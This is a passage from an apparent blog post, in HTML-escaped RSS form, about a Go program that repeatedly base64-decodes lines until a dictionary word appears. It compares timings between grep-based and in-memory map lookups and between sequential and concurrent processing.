&lt;span class="nx">decoded&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nx">base64&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">StdEncoding&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">DecodeString&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">encodedStr&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nb">string&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">decoded&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order to test if the result of a decode operation is a valid word, a helper function was written, which is passed a string as an argument and performed the call to grep via &lt;code>os/exec&lt;/code>.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="kd">func&lt;/span> &lt;span class="nf">dictLookup&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">word&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="kt">bool&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">dictLocation&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="s">&amp;#34;/usr/share/dict/american-english&amp;#34;&lt;/span>
&lt;span class="nx">_&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">exec&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Command&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;grep&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="s">&amp;#34;-w&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">word&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">dictLocation&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nf">Output&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="nx">err&lt;/span> &lt;span class="o">!=&lt;/span> &lt;span class="kc">nil&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="kc">false&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="kc">true&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, putting these pieces together, there is a function which reads in the txt file, iterates over the lines and calls decode and dict lookup until a valid word comes out, then prints it to standard output. Below is the sample code.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="nx">scanner&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">bufio&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">NewScanner&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">file&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">line&lt;/span> &lt;span class="kt">string&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Scan&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">line&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nf">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Text&lt;/span>&lt;span class="p">())&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="p">!(&lt;/span>&lt;span class="nf">dictLookup&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">line&lt;/span>&lt;span class="p">))&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">line&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nf">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">line&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nx">fmt&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Println&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">line&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="initial-results">Initial results&lt;/h3>
&lt;p>The sample code worked well enough and running it on the test / sample data provided yielded correct output, so all seemed to be fine!&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">flrnks@t460:~/drop_the_bass &lt;span class="o">(&lt;/span>master&lt;span class="o">)&lt;/span> ▶ go run main.go input.txt
interpretation
sanctioned
lawn
electives
unifying
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Then came the idea to try to test this code on both of my laptops because it did not seem to run very quickly, even though it only had to decode 5 lines. So one of the machines I have is a ThinkPad T460 with an i5 and 16GB of RAM, while the other is a 15&amp;rdquo; MacBook Pro with i9 CPU and 32GB of RAM. I initially developed the code on the ThinkPad, and was quite surprised how much slower it was to execute on the MacBook. I would have expected that it would be the opposite, since the ThinkPad is around 3-4 years old already with a less powerful CPU. Initial test results from both machine:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash"> &lt;span class="o">[&lt;/span>MacBook&lt;span class="o">]&lt;/span> &lt;span class="o">[&lt;/span>ThinkPad&lt;span class="o">]&lt;/span>
interpretation 285.76ms 32.61ms
lawn 425.63ms 59.31ms
unifying 1.10s 93.60ms
electives 1.20s 91.10ms
sanctioned 6.18s 141.28ms
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Overall the MacBook took on average 9 seconds to finish, while the ThinkPad took around 0.5 to 1 second to finish. This was not normal, so I had to investigate! 👀 😄&lt;/p>
&lt;h3 id="performance-tuning-10">Performance Tuning 1.0&lt;/h3>
&lt;p>Seeing the results and the difference in performance, I was quite interested what could be the cause for such a performance drop on the MacBook. My first idea was to implement concurrency into the processing, so that instead of reading lines sequentially, they get processed in parallel by getting assigned to a worker using channels, which will return it to the main routine waiting for the results.&lt;/p>
&lt;p>&lt;img src="concurrent-go.png" alt="Go concurrency implemented">&lt;/p>
&lt;p>The above figure contains the basic idea for this concurrent processing model and the below code snippet shows some parts of the code that are most important:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="c1">// define the channels for distributing work and collecting the results
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="nx">jobs&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nb">make&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">chan&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="nx">results&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nb">make&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">chan&lt;/span> &lt;span class="kt">string&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">// use the waitgroup for syncing up between the workers
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="nx">wg&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nb">new&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">sync&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">WaitGroup&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1">// start up some workers that will block and wait
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="nx">w&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">w&lt;/span> &lt;span class="o">&amp;lt;=&lt;/span> &lt;span class="mi">5&lt;/span>&lt;span class="p">;&lt;/span> &lt;span class="nx">w&lt;/span>&lt;span class="o">++&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">wg&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Add&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">go&lt;/span> &lt;span class="nf">workerFunc&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">jobs&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">results&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">wg&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="c1">// interate over the file line by line and queue them up in the jobs channel
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">go&lt;/span> &lt;span class="kd">func&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">scanner&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">bufio&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">NewScanner&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">file&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Scan&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">jobs&lt;/span> &lt;span class="o">&amp;lt;-&lt;/span> &lt;span class="nx">scanner&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Text&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="nb">close&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">jobs&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}()&lt;/span>
&lt;span class="c1">// In parallel routine wait for WG to finish and close channel for results
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">go&lt;/span> &lt;span class="kd">func&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">wg&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Wait&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="nb">close&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">results&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}()&lt;/span>
&lt;span class="c1">// Print out the results from the results channel.
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="k">for&lt;/span> &lt;span class="nx">v&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="k">range&lt;/span> &lt;span class="nx">results&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">fmt&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Println&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">v&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This parallel processing has noticeable improved the performance, but still did not eliminate the substantial difference between the two platforms.&lt;/p>
&lt;p>&lt;em>Note&lt;/em>: implementing the concurrent model means the words on the standard output will appear in a random order, and so the submission to the grading system might fail.&lt;/p>
&lt;h3 id="performance-tuning-20">Performance Tuning 2.0&lt;/h3>
&lt;p>Next, I was looking around on the internet (StackOverFlow.com in particular) where I got the idea to stop calling grep via the &lt;code>os/exec&lt;/code> package, and instead read the contents of the dictionary into memory and perform lookups that way. Essentially this was trading memory footprint for speed. So then I create a global dictionary {&amp;lsquo;map[string]bool&amp;rsquo;} which was loaded once at the start of the program and used as often as needed by the various go-routines. And this was perfectly fine because the worker routines called read-only operations on this map so there was no issue with concurrent access to the global map variable.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-go" data-lang="go">&lt;span class="kd">var&lt;/span> &lt;span class="nx">wordDict&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="nb">make&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kd">map&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="kt">string&lt;/span>&lt;span class="p">]&lt;/span>&lt;span class="kt">bool&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="kd">func&lt;/span> &lt;span class="nf">loadDictionary&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">dict&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">_&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">os&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s">&amp;#34;/usr/share/dict/american-english&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">defer&lt;/span> &lt;span class="nx">dict&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Close&lt;/span>&lt;span class="p">()&lt;/span>
&lt;span class="nx">ds&lt;/span> &lt;span class="o">:=&lt;/span> &lt;span class="nx">bufio&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">NewScanner&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">dict&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="k">for&lt;/span> &lt;span class="nx">ds&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Scan&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">wordDict&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">ds&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nf">Text&lt;/span>&lt;span class="p">()]&lt;/span> &lt;span class="p">=&lt;/span> &lt;span class="kc">true&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This way the lookups in the dictionary cannot be a bottleneck of the I/O system of the particular OS the program is running on. Executing the same timing test this time yielded much improved results. It became clear that the issue on the MacBook was slow execution of the external &lt;code>grep&lt;/code> call from the GO program. Why this is the reason I am not sure, but the results speak for themselves:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash"> &lt;span class="o">[&lt;/span>MacBook&lt;span class="o">]&lt;/span> &lt;span class="o">[&lt;/span>ThinkPad&lt;span class="o">]&lt;/span>
interpretation 54.691µs 24.17µs
lawn 65.922µs 9.176µs
unifying 155.726µs 71.785µs
electives 113.074µs 47.478µs
sanctioned 286.94µs 464.20µs
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Somehow the older and less powerful ThinkPad still seems considerably faster, but at least the difference is not so substantial anymore&amp;hellip; 😌&lt;/p>
&lt;h3 id="results">Results&lt;/h3>
&lt;p>The below picture briefly summarizes the observed results when it comes to performance, which was measured by execution time. In order to mitigate transient effects on execution time, there were 10 measurements taken for each variant.&lt;/p>
&lt;p>&lt;img src="perf.png" alt="Performance measurements">&lt;/p>
&lt;p>Explanation for the different variants (Seq vs. Con and Grep vs Map):&lt;/p>
&lt;ul>
&lt;li>&lt;code>Seq&lt;/code>: each line is decoded one after the other in sequence.&lt;/li>
&lt;li>&lt;code>Con&lt;/code>: each line is processed concurrently on a pool of workers.&lt;/li>
&lt;li>&lt;code>Grep&lt;/code>: dictionary lookup done via exec call to GREP.&lt;/li>
&lt;li>&lt;code>Map&lt;/code>: dictionary is loaded into a string map in memory.&lt;/li>
&lt;/ul>
&lt;p>Quite frankly, the results speak for themselves. The most notable thing is that, compared to the most basic version (Seq-Grep), the biggest improvement is achieved not by using concurrency, but by eliminating the repeated calls to Grep.&lt;/p>
&lt;p>This is not to say that enabling concurrency did not have an impact on the execution time, on average it decreased from 9 to 6 seconds, which is quite good already!&lt;/p>
&lt;p>However, I/O latency seems to have a higher cost on the performance than lack of parallel processing. At least at the scale of input for this example this is the case. This difference is less pronounced when tests were run using a file which had 500 lines of encoded words (instead of just 5).&lt;/p>
&lt;h3 id="conclusion">Conclusion&lt;/h3>
&lt;p>Never underestimate the power of I/O delay and the effect it can have on your program. Even if you have a very powerful machine, this can bog your performance down considerably! Also, it may help your program&amp;rsquo;s performance further, if you implement proper concurrent processing whenever possible.&lt;/p></description></item></channel></rss>